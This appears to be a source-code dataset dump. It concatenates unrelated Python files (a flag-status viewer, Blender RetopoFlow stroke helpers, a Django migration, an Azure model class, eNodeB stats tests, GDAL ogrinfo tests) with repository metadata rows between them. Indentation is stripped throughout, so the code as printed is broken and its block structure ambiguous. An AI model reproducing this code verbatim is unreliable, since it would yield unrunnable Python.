Status.FULLMAST: ("resources/images/flag_full.png", " - Full Mast"),
Status.HALFMAST: ("resources/images/flag_half.png", " - Half Mast"),
Status.UNDETERMINED: ("resources/images/undetermined.png", " - Unable to determine"),
}
def _get_page(url: str) -> str:
""""Return the webpage text of 'url' if successful, or else an empty string"""
try:
request = requests.get(url)
except requests.exceptions.ConnectionError:
return ""
return request.text
def _is_comment_start(line: str):
return line.lstrip().startswith(HTML_COMMENT_START)
def _is_comment_end(line: str):
return line.rstrip().endswith(HTML_COMMENT_END)
def _is_single_line_comment(line: str):
return _is_comment_start(line) and _is_comment_end(line)
def _is_start_multiline_comment(line: str):
return _is_comment_start(line) and not _is_comment_end(line)
def _skip_html_comments(text):
def _skip_intervening_comment_lines():
while not _is_comment_end(next(document)):
continue
next(document) # position iterator at line right after the closing comment line
# explicitly create iterator as it will be manually manipulated
document = iter(text.split("\r\n"))
for line in document:
if not line.strip():
continue
if _is_single_line_comment(line):
continue # allows skipping consecutive comment lines
if _is_start_multiline_comment(line):
_skip_intervening_comment_lines()
continue
yield line
def _find_status_line(text: str) -> str:
for line in _skip_html_comments(text):
if MARKER_1 in line:
return line
return ""
def get_status() -> Status:
status_line = _find_status_line(_get_page(URL))
if not status_line:
return Status.UNDETERMINED
if MARKER_2 in status_line:
return Status.FULLMAST
return Status.HALFMAST
def main():
status = get_status()
root = Tk()
window_title = f"Flag Status for {date.today().strftime(DATE_FORMAT)}"
file_name, title_suffix = status_context[status]
status_image = ImageTk.PhotoImage(Image.open(file_name))
label = ttk.Label(root, image=status_image)
root.title("".join([window_title, title_suffix]))
label.pack()
center(root)
root.mainloop()
if __name__ == '__main__':
main()
| 24.86087
| 89
| 0.685904
|
bd49d2245a2a07d39902fe19ce72d64f5516831f
| 6,627
|
py
|
Python
|
scripts/addons/RetopoFlow/retopoflow/rftool_strokes/strokes_utils.py
|
Tilapiatsu/blender-custom_conf
|
05592fedf74e4b7075a6228b8448a5cda10f7753
|
[
"MIT"
] | 1,600
|
2015-03-19T12:26:15.000Z
|
2022-03-30T21:07:37.000Z
|
retopoflow/rftool_strokes/strokes_utils.py
|
Varelshen/retopoflow
|
5e9fd7ff65e7a5a64bf3078c78fb71cc270fdb71
|
[
"OML"
] | 1,026
|
2015-03-18T22:17:42.000Z
|
2022-03-28T17:47:04.000Z
|
retopoflow/rftool_strokes/strokes_utils.py
|
Varelshen/retopoflow
|
5e9fd7ff65e7a5a64bf3078c78fb71cc270fdb71
|
[
"OML"
] | 241
|
2015-03-19T13:44:36.000Z
|
2022-03-30T21:07:39.000Z
|
'''
Copyright (C) 2021 CG Cookie
http://cgcookie.com
hello@cgcookie.com
Created by Jonathan Denning, Jonathan Williamson
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import bgl
import bpy
import math
from mathutils import Vector, Matrix
from mathutils.geometry import intersect_line_line_2d
from ...addon_common.common.debug import dprint
from ...addon_common.common.maths import Point,Point2D,Vec2D,Vec, Normal, clamp
from ...addon_common.common.bezier import CubicBezierSpline, CubicBezier
from ...addon_common.common.utils import iter_pairs
def process_stroke_filter(stroke, min_distance=1.0, max_distance=2.0):
''' filter stroke to pts that are at least min_distance apart '''
nstroke = stroke[:1]
for p in stroke[1:]:
v = p - nstroke[-1]
l = v.length
if l < min_distance: continue
d = v / l
while l > 0:
q = nstroke[-1] + d * min(l, max_distance)
nstroke.append(q)
l -= max_distance
return nstroke
def process_stroke_source(stroke, raycast, Point_to_Point2D=None, is_point_on_mirrored_side=None, mirror_point=None, clamp_point_to_symmetry=None):
''' filter out pts that don't hit source on non-mirrored side '''
pts = [(pt, raycast(pt)[0]) for pt in stroke]
pts = [(pt, p3d) for (pt, p3d) in pts if p3d]
if Point_to_Point2D and mirror_point:
pts_ = [Point_to_Point2D(mirror_point(p3d)) for (_, p3d) in pts]
pts = [(pt, raycast(pt)[0]) for pt in pts_]
pts = [(pt, p3d) for (pt, p3d) in pts if p3d]
if Point_to_Point2D and clamp_point_to_symmetry:
pts_ = [Point_to_Point2D(clamp_point_to_symmetry(p3d)) for (_, p3d) in pts]
pts = [(pt, raycast(pt)[0]) for pt in pts_]
pts = [(pt, p3d) for (pt, p3d) in pts if p3d]
if is_point_on_mirrored_side:
pts = [(pt, p3d) for (pt, p3d) in pts if not is_point_on_mirrored_side(p3d)]
return [pt for (pt, _) in pts]
def find_edge_cycles(edges):
edges = set(edges)
verts = {v: set() for e in edges for v in e.verts}
for e in edges:
for v in e.verts:
verts[v].add(e)
in_cycle = set()
for vstart in verts:
if vstart in in_cycle: continue
for estart in vstart.link_edges:
if estart not in edges: continue
if estart in in_cycle: continue
q = [(estart, vstart, None)]
found = None
trace = {}
while q:
ec, vc, ep = q.pop(0)
if ec in trace: continue
trace[ec] = (vc, ep)
vn = ec.other_vert(vc)
if vn == vstart:
found = ec
break
q += [(en, vn, ec) for en in vn.link_edges if en in edges]
if not found: continue
l = [found]
in_cycle.add(found)
while True:
vn, ep = trace[l[-1]]
in_cycle.add(vn)
in_cycle.add(ep)
if vn == vstart: break
l.append(ep)
yield l
def find_edge_strips(edges):
''' find edge strips '''
edges = set(edges)
verts = {v: set() for e in edges for v in e.verts}
for e in edges:
for v in e.verts:
verts[v].add(e)
ends = [v for v in verts if len(verts[v]) == 1]
def get_edge_sequence(v0, v1):
trace = {}
q = [(None, v0)]
while q:
vf,vt = q.pop(0)
if vt in trace: continue
trace[vt] = vf
if vt == v1: break
for e in verts[vt]:
q.append((vt, e.other_vert(vt)))
if v1 not in trace: return []
l = []
while v1 is not None:
l.append(v1)
v1 = trace[v1]
l.reverse()
return [v0.shared_edge(v1) for (v0, v1) in iter_pairs(l, wrap=False)]
for i0 in range(len(ends)):
for i1 in range(i0+1,len(ends)):
l = get_edge_sequence(ends[i0], ends[i1])
if l: yield l
def get_strip_verts(edge_strip):
l = len(edge_strip)
if l == 0: return []
if l == 1:
e = edge_strip[0]
return list(e.verts) if e.is_valid else []
vs = []
for e0, e1 in iter_pairs(edge_strip, wrap=False):
vs.append(e0.shared_vert(e1))
vs = [edge_strip[0].other_vert(vs[0])] + vs + [edge_strip[-1].other_vert(vs[-1])]
return vs
def restroke(stroke, percentages):
lens = [(s0 - s1).length for (s0, s1) in iter_pairs(stroke, wrap=False)]
total_len = sum(lens)
stops = [max(0, min(1, p)) * total_len for p in percentages]
dist = 0
istroke = 0
istop = 0
nstroke = []
while istroke + 1 < len(stroke) and istop < len(stops):
if lens[istroke] <= 0:
istroke += 1
continue
t = (stops[istop] - dist) / lens[istroke]
if t < 0:
istop += 1
elif t > 1.000001:
dist += lens[istroke]
istroke += 1
else:
s0, s1 = stroke[istroke], stroke[istroke + 1]
nstroke.append(s0 + (s1 - s0) * t)
istop += 1
return nstroke
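# Example sketch for restroke() (assumes Blender's bundled mathutils, already
# imported above; the stroke points are illustrative only):
#
#   stroke = [Vector((0, 0)), Vector((10, 0))]
#   restroke(stroke, [0.0, 0.5, 1.0])
#   # -> [Vector((0, 0)), Vector((5, 0)), Vector((10, 0))]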
def walk_to_corner(from_vert, to_edges):
to_verts = {v for e in to_edges for v in e.verts}
edges = [
(e, from_vert, None)
for e in from_vert.link_edges
if not e.is_manifold and e.is_valid
]
touched = {}
found = None
while edges:
ec, v0, ep = edges.pop(0)
if ec in touched: continue
touched[ec] = (v0, ep)
v1 = ec.other_vert(v0)
if v1 in to_verts:
found = ec
break
nedges = [
(en, v1, ec)
for en in v1.link_edges
if en != ec and not en.is_manifold and en.is_valid
]
edges += nedges
if not found: return None
# walk back
walk = [found]
while True:
ec = walk[-1]
v0, ep = touched[ec]
if v0 == from_vert:
break
walk.append(ep)
return walk
| 33.469697
| 147
| 0.56813
|
a6c4773c55a956ac11906f5904ca5a702b588514
| 621
|
py
|
Python
|
Eso.API.Discovery/integration/execution_queue_handler.py
|
afgbeveridge/EsotericLanguagesToolkit
|
05f391f5c03c9fc7dd60f7f4ef89e480315dc1bc
|
[
"MIT"
] | 1
|
2021-07-14T23:39:19.000Z
|
2021-07-14T23:39:19.000Z
|
Eso.API.Discovery/integration/execution_queue_handler.py
|
afgbeveridge/EsotericLanguagesToolkit
|
05f391f5c03c9fc7dd60f7f4ef89e480315dc1bc
|
[
"MIT"
] | null | null | null |
Eso.API.Discovery/integration/execution_queue_handler.py
|
afgbeveridge/EsotericLanguagesToolkit
|
05f391f5c03c9fc7dd60f7f4ef89e480315dc1bc
|
[
"MIT"
] | null | null | null |
import json
from json.decoder import JSONDecodeError
import datetime
import io
from constants import *
from repos.language_repository import LanguageRepository
from integration.abstract_queue_handler import AbstractQueueHandler
class ExecutionQueueHandler(AbstractQueueHandler):
def __init__(self, nature):
super().__init__(nature)
def must_exist(self):
return True
def process(self, payload, definition):
definition[EXECUTION_LAST] = datetime.datetime.now()
cnt = definition[EXECUTION_COUNT]
definition[EXECUTION_COUNT] = int(cnt) + 1 if cnt is not None else 1
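# Usage sketch (commented out): EXECUTION_LAST / EXECUTION_COUNT come from
# `constants`; the nature string and definition dict below are illustrative only.
#
#   handler = ExecutionQueueHandler("execution")
#   definition = {EXECUTION_LAST: None, EXECUTION_COUNT: None}
#   handler.process(payload={}, definition=definition)
#   definition[EXECUTION_COUNT]   # -> 1 on the first call, incremented after that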
| 27
| 76
| 0.753623
|
22fc9c5473a1f92e49cec12d524d0bf526b73f24
| 1,200
|
py
|
Python
|
yellow_club_project/yellow_site/migrations/0003_auto_20200629_0721.py
|
yellow-club/yellow_site
|
03999920d43877cbc54788aa2821d0c39b3c591e
|
[
"MIT"
] | null | null | null |
yellow_club_project/yellow_site/migrations/0003_auto_20200629_0721.py
|
yellow-club/yellow_site
|
03999920d43877cbc54788aa2821d0c39b3c591e
|
[
"MIT"
] | 2
|
2020-06-28T11:18:12.000Z
|
2020-06-30T12:58:21.000Z
|
yellow_club_project/yellow_site/migrations/0003_auto_20200629_0721.py
|
yellow-club/yellow_site
|
03999920d43877cbc54788aa2821d0c39b3c591e
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.7 on 2020-06-29 07:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('yellow_site', '0002_auto_20200627_1450'),
]
operations = [
migrations.AlterModelOptions(
name='post',
options={'ordering': ['-created_at'], 'verbose_name': 'Статья', 'verbose_name_plural': 'Статьи'},
),
migrations.RemoveField(
model_name='post',
name='event_date',
),
migrations.RemoveField(
model_name='post',
name='event_number',
),
migrations.RemoveField(
model_name='post',
name='speaker',
),
migrations.AddField(
model_name='post',
name='author',
field=models.CharField(default='', max_length=100, verbose_name='Автор'),
preserve_default=False,
),
migrations.AddField(
model_name='post',
name='updated_at',
field=models.DateTimeField(auto_now_add=True, default='2020-06-29', verbose_name='Обновлено'),
preserve_default=False,
),
]
| 28.571429
| 109
| 0.5575
|
6340e9418a4530f0736dfbf3f441c5afdf8f3247
| 1,586
|
py
|
Python
|
test/azure/Expected/AcceptanceTests/AzureParameterGrouping/azureparametergrouping/models/parameter_grouping_post_required_parameters_py3.py
|
iscai-msft/autorest.python
|
a9f38dd762fbc046ce6197bfabea2f56045d2957
|
[
"MIT"
] | null | null | null |
test/azure/Expected/AcceptanceTests/AzureParameterGrouping/azureparametergrouping/models/parameter_grouping_post_required_parameters_py3.py
|
iscai-msft/autorest.python
|
a9f38dd762fbc046ce6197bfabea2f56045d2957
|
[
"MIT"
] | null | null | null |
test/azure/Expected/AcceptanceTests/AzureParameterGrouping/azureparametergrouping/models/parameter_grouping_post_required_parameters_py3.py
|
iscai-msft/autorest.python
|
a9f38dd762fbc046ce6197bfabea2f56045d2957
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ParameterGroupingPostRequiredParameters(Model):
"""Additional parameters for post_required operation.
All required parameters must be populated in order to send to Azure.
:param body: Required.
:type body: int
:param custom_header:
:type custom_header: str
:param query: Query parameter with default. Default value: 30 .
:type query: int
:param path: Required. Path parameter
:type path: str
"""
_validation = {
'body': {'required': True},
'path': {'required': True},
}
_attribute_map = {
'body': {'key': '', 'type': 'int'},
'custom_header': {'key': '', 'type': 'str'},
'query': {'key': '', 'type': 'int'},
'path': {'key': '', 'type': 'str'},
}
def __init__(self, *, body: int, path: str, custom_header: str=None, query: int=30, **kwargs) -> None:
super(ParameterGroupingPostRequiredParameters, self).__init__(**kwargs)
self.body = body
self.custom_header = custom_header
self.query = query
self.path = path
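# Usage sketch (values are illustrative only):
#
#   params = ParameterGroupingPostRequiredParameters(body=1234, path="path")
#   params.query           # -> 30 (default)
#   params.custom_header   # -> None unless supplied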
| 33.041667
| 106
| 0.580076
|
d09d4f443faa0fb33e47e7e4fe5e8fff220ac10e
| 1,632
|
py
|
Python
|
frosted/test/test_noqa.py
|
magro11/frosted
|
bd05f782d9bee62379b8447dd4dcb2818f7f2142
|
[
"MIT"
] | 59
|
2015-01-05T19:23:58.000Z
|
2018-05-11T09:42:53.000Z
|
frosted/test/test_noqa.py
|
magro11/frosted
|
bd05f782d9bee62379b8447dd4dcb2818f7f2142
|
[
"MIT"
] | 5
|
2015-09-15T03:57:22.000Z
|
2017-12-27T16:17:53.000Z
|
frosted/test/test_noqa.py
|
magro11/frosted
|
bd05f782d9bee62379b8447dd4dcb2818f7f2142
|
[
"MIT"
] | 10
|
2015-01-27T10:37:10.000Z
|
2018-03-05T19:10:44.000Z
|
from frosted import messages as m
from frosted.api import _noqa_lines, _re_noqa, check
from frosted.reporter import Reporter
from .utils import LoggingReporter, flakes
def test_regex():
# simple format
assert _re_noqa.search('#noqa')
assert _re_noqa.search('# noqa')
# simple format is strict, must be at start of comment
assert not _re_noqa.search('# foo noqa')
# verbose format (not strict like simple format)
assert _re_noqa.search('#frosted:noqa')
assert _re_noqa.search('# frosted: noqa')
assert _re_noqa.search('# foo frosted: noqa')
def test_checker_ignore_lines():
# ignore same line
flakes('from fu import *', ignore_lines=[1])
# don't ignore different line
flakes('from fu import *', m.ImportStarUsed, ignore_lines=[2])
def test_noqa_lines():
assert _noqa_lines('from fu import bar; bar') == []
assert _noqa_lines('from fu import * # noqa; bar') == [1]
assert _noqa_lines('from fu import * #noqa\nbar\nfoo # frosted: noqa') == [1, 3]
def test_check_integration():
""" make sure all the above logic comes together correctly in the check() function """
output = []
reporter = LoggingReporter(output)
result = check('from fu import *', 'test', reporter, not_ignore_frosted_errors=['E103'])
# errors reported
assert result == 1
assert "unable to detect undefined names" in output.pop(0)[1]
# same test, but with ignore set
output = []
reporter = LoggingReporter(output)
result = check('from fu import * # noqa', 'test', reporter)
# errors reported
assert result == 0
assert len(output) == 0
| 30.222222
| 92
| 0.679534
|
f1bc5abc818df13b291097ac4a0f9080c9e2a5b2
| 4,795
|
py
|
Python
|
tests/stats_manager_tests.py
|
aweimeow/enodebd
|
e1cd20693153e6b85e5d1bf9d21af2501c358601
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/stats_manager_tests.py
|
aweimeow/enodebd
|
e1cd20693153e6b85e5d1bf9d21af2501c358601
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/stats_manager_tests.py
|
aweimeow/enodebd
|
e1cd20693153e6b85e5d1bf9d21af2501c358601
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# SPDX-FileCopyrightText: 2020 The Magma Authors.
# SPDX-FileCopyrightText: 2022 Open Networking Foundation <support@opennetworking.org>
#
# SPDX-License-Identifier: BSD-3-Clause
from unittest import TestCase, mock
from xml.etree import ElementTree
import pkg_resources
from enodebd import metrics
from data_models.data_model_parameters import ParameterName
from devices.device_utils import EnodebDeviceName
from state_machines.enb_acs_manager import StateMachineManager
from stats_manager import StatsManager
from tests.test_utils.config_builder import EnodebConfigBuilder
from tests.test_utils.enb_acs_builder import (
EnodebAcsStateMachineBuilder,
)
class StatsManagerTest(TestCase):
"""
Tests for eNodeB statistics manager
"""
def setUp(self) -> None:
service = EnodebConfigBuilder.get_service_config()
self.enb_acs_manager = StateMachineManager(service)
self.mgr = StatsManager(self.enb_acs_manager)
self.is_clear_stats_called = False
def tearDown(self):
self.mgr = None
def test_check_rf_tx(self):
""" Check that stats are cleared when transmit is disabled on eNB """
handler = EnodebAcsStateMachineBuilder \
.build_acs_state_machine(EnodebDeviceName.BAICELLS)
with mock.patch(
'magma.enodebd.devices.baicells.BaicellsHandler.is_enodeb_connected',
return_value=True,
):
handler.device_cfg.set_parameter(ParameterName.RF_TX_STATUS, True)
handler.device_cfg.set_parameter(
ParameterName.SERIAL_NUMBER,
'123454',
)
with mock.patch(
'magma.enodebd.stats_manager.StatsManager'
'._clear_stats',
) as func:
self.mgr._check_rf_tx_for_handler(handler)
func.assert_not_called()
handler.device_cfg.set_parameter(
ParameterName.RF_TX_STATUS,
False,
)
self.mgr._check_rf_tx_for_handler(handler)
func.assert_any_call()
def test_parse_stats(self):
""" Test that example statistics from eNodeB can be parsed, and metrics
updated """
# Example performance metrics structure, sent by eNodeB
pm_file_example = pkg_resources.resource_string(
__name__,
'pm_file_example.xml',
)
root = ElementTree.fromstring(pm_file_example)
self.mgr._parse_pm_xml('1234', root)
# Check that metrics were correctly populated
# See '<V i="5">123</V>' in pm_file_example
rrc_estab_attempts = metrics.STAT_RRC_ESTAB_ATT.collect()
self.assertEqual(rrc_estab_attempts[0].samples[0][2], 123)
# See '<V i="7">99</V>' in pm_file_example
rrc_estab_successes = metrics.STAT_RRC_ESTAB_SUCC.collect()
self.assertEqual(rrc_estab_successes[0].samples[0][2], 99)
# See '<SV>654</SV>' in pm_file_example
rrc_reestab_att_reconf_fail = \
metrics.STAT_RRC_REESTAB_ATT_RECONF_FAIL.collect()
self.assertEqual(rrc_reestab_att_reconf_fail[0].samples[0][2], 654)
# See '<SV>65537</SV>' in pm_file_example
erab_rel_req_radio_conn_lost = \
metrics.STAT_ERAB_REL_REQ_RADIO_CONN_LOST.collect()
self.assertEqual(erab_rel_req_radio_conn_lost[0].samples[0][2], 65537)
pdcp_user_plane_bytes_ul = \
metrics.STAT_PDCP_USER_PLANE_BYTES_UL.collect()
pdcp_user_plane_bytes_dl = \
metrics.STAT_PDCP_USER_PLANE_BYTES_DL.collect()
self.assertEqual(pdcp_user_plane_bytes_ul[0].samples[0][1], {'enodeb': '1234'})
self.assertEqual(pdcp_user_plane_bytes_dl[0].samples[0][1], {'enodeb': '1234'})
self.assertEqual(pdcp_user_plane_bytes_ul[0].samples[0][2], 1000)
self.assertEqual(pdcp_user_plane_bytes_dl[0].samples[0][2], 500)
def test_clear_stats(self):
"""
Check that stats of PMPM_FILE_TO_METRIC_MAP is cleared successfully
"""
# Example performance metrics structure, sent by eNodeB
pm_file_example = pkg_resources.resource_string(
__name__,
'pm_file_example.xml',
)
root = ElementTree.fromstring(pm_file_example)
self.mgr._parse_pm_xml('1234', root)
# Check that metrics were correctly populated
rrc_estab_attempts = metrics.STAT_RRC_ESTAB_ATT.collect()
self.assertEqual(rrc_estab_attempts[0].samples[0][2], 123)
self.mgr._clear_stats()
rrc_estab_attempts = metrics.STAT_RRC_ESTAB_ATT.collect()
# After clearing stats collection of metric should report 0
self.assertEqual(rrc_estab_attempts[0].samples[0][2], 0)
| 40.294118
| 87
| 0.672576
|
757bf5846bd3969b78e5d71845cb2f69cb379c42
| 588
|
py
|
Python
|
OpenAPI/api/tools/prestarter.py
|
eleldar/Translator
|
33e41e545d63c2319cdf74284230f6ca70a3e9e7
|
[
"MIT"
] | null | null | null |
OpenAPI/api/tools/prestarter.py
|
eleldar/Translator
|
33e41e545d63c2319cdf74284230f6ca70a3e9e7
|
[
"MIT"
] | null | null | null |
OpenAPI/api/tools/prestarter.py
|
eleldar/Translator
|
33e41e545d63c2319cdf74284230f6ca70a3e9e7
|
[
"MIT"
] | null | null | null |
import os
from pathlib import Path
import codecs
drive, path_and_file = os.path.splitdrive(Path(__file__).absolute())
path, _ = os.path.split(path_and_file)
curdir = os.path.join(drive, path)
files_path = os.path.join(curdir, 'prestart_examples')
def examples(direct):
language_id = direct.split('-')[0]
file = os.path.join(files_path, f'input.{language_id}')
try:
with codecs.open(file, "r", "utf_8_sig") as f:
text = f.readlines()
except FileNotFoundError:
text = []
return text
if __name__ == '__main__':
print(examples('en-ru'))
| 26.727273
| 68
| 0.668367
|
f55e63940184a65bde15d4ff755e62803206043f
| 18,539
|
py
|
Python
|
autotest/utilities/test_ogrinfo.py
|
chambbj/gdal
|
3d56aecb5b8e9890dae8f560acd099992e707d12
|
[
"MIT"
] | null | null | null |
autotest/utilities/test_ogrinfo.py
|
chambbj/gdal
|
3d56aecb5b8e9890dae8f560acd099992e707d12
|
[
"MIT"
] | null | null | null |
autotest/utilities/test_ogrinfo.py
|
chambbj/gdal
|
3d56aecb5b8e9890dae8f560acd099992e707d12
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: ogrinfo testing
# Author: Even Rouault <even dot rouault @ mines-paris dot org>
#
###############################################################################
# Copyright (c) 2008, Even Rouault <even dot rouault @ mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
import os
sys.path.append( '../pymod' )
from osgeo import gdal
import gdaltest
import ogrtest
import test_cli_utilities
###############################################################################
# Simple test
def test_ogrinfo_1():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
(ret, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp')
if not (err is None or err == '') :
gdaltest.post_reason('got error/warning')
print(err)
return 'fail'
if ret.find('ESRI Shapefile') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -ro option
def test_ogrinfo_2():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' -ro ../ogr/data/poly.shp')
if ret.find('ESRI Shapefile') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -al option
def test_ogrinfo_3():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' -al ../ogr/data/poly.shp')
if ret.find('Layer name: poly') == -1:
gdaltest.post_reason('fail')
return 'fail'
if ret.find('Geometry: Polygon') == -1:
gdaltest.post_reason('fail')
return 'fail'
if ret.find('Feature Count: 10') == -1:
gdaltest.post_reason('fail')
return 'fail'
if ret.find('Extent: (478315') == -1:
gdaltest.post_reason('fail')
return 'fail'
if ret.find('PROJCS["OSGB') == -1:
gdaltest.post_reason('fail')
return 'fail'
if ret.find('AREA: Real (') == -1:
gdaltest.post_reason('fail')
return 'fail'
return 'success'
###############################################################################
# Test layer name
def test_ogrinfo_4():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly')
if ret.find('Feature Count: 10') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -sql option
def test_ogrinfo_5():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp -sql "select * from poly"')
if ret.find('Feature Count: 10') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -geom=NO option
def test_ogrinfo_6():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly -geom=no')
if ret.find('Feature Count: 10') == -1:
return 'fail'
if ret.find('POLYGON') != -1:
return 'fail'
return 'success'
###############################################################################
# Test -geom=SUMMARY option
def test_ogrinfo_7():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly -geom=summary')
if ret.find('Feature Count: 10') == -1:
return 'fail'
if ret.find('POLYGON (') != -1:
return 'fail'
if ret.find('POLYGON :') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -spat option
def test_ogrinfo_8():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly -spat 479609 4764629 479764 4764817')
if ogrtest.have_geos():
if ret.find('Feature Count: 4') == -1:
return 'fail'
return 'success'
else:
if ret.find('Feature Count: 5') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -where option
def test_ogrinfo_9():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly -where "EAS_ID=171"')
if ret.find('Feature Count: 1') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -fid option
def test_ogrinfo_10():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly -fid 9')
if ret.find('OGRFeature(poly):9') == -1:
return 'fail'
return 'success'
###############################################################################
# Test -fields=no option
def test_ogrinfo_11():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' ../ogr/data/poly.shp poly -fields=no')
if ret.find('AREA (Real') != -1:
return 'fail'
if ret.find('POLYGON (') == -1:
return 'fail'
return 'success'
###############################################################################
# Test ogrinfo --version
def test_ogrinfo_12():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' --version', check_memleak = False )
if ret.find(gdal.VersionInfo('--version')) != 0:
print(ret)
return 'fail'
return 'success'
###############################################################################
# Test erroneous use of --config
def test_ogrinfo_13():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
(out, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' --config', check_memleak = False )
if err.find('--config option given without a key and value argument') < 0:
print(err)
return 'fail'
return 'success'
###############################################################################
# Test erroneous use of --mempreload
def test_ogrinfo_14():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
(out, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' --mempreload', check_memleak = False )
if err.find('--mempreload option given without directory path') < 0:
print(err)
return 'fail'
return 'success'
###############################################################################
# Test --mempreload
def test_ogrinfo_15():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
(ret, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' --debug on --mempreload ../ogr/data /vsimem/poly.shp', check_memleak = False )
if ret.find("ESRI Shapefile") < 0:
print(ret)
return 'fail'
return 'success'
###############################################################################
# Test erroneous use of --debug
def test_ogrinfo_16():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
(out, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' --debug', check_memleak = False )
if err.find('--debug option given without debug level') < 0:
print(err)
return 'fail'
return 'success'
###############################################################################
# Test erroneous use of --optfile
def test_ogrinfo_17():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
(out, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' --optfile', check_memleak = False )
if err.find('--optfile option given without filename') < 0:
gdaltest.post_reason('fail')
print(err)
return 'fail'
(out, err) = gdaltest.runexternal_out_and_err(test_cli_utilities.get_ogrinfo_path() + ' --optfile /foo/bar', check_memleak = False )
if err.find('Unable to open optfile') < 0:
gdaltest.post_reason('fail')
print(err)
return 'fail'
return 'success'
###############################################################################
# Test --optfile
def test_ogrinfo_18():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
f = open('tmp/optfile.txt', 'wt')
f.write('# comment\n')
f.write('../ogr/data/poly.shp\n')
f.close()
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' --optfile tmp/optfile.txt', check_memleak = False )
os.unlink('tmp/optfile.txt')
if ret.find("ESRI Shapefile") < 0:
print(ret)
return 'fail'
return 'success'
###############################################################################
# Test --formats
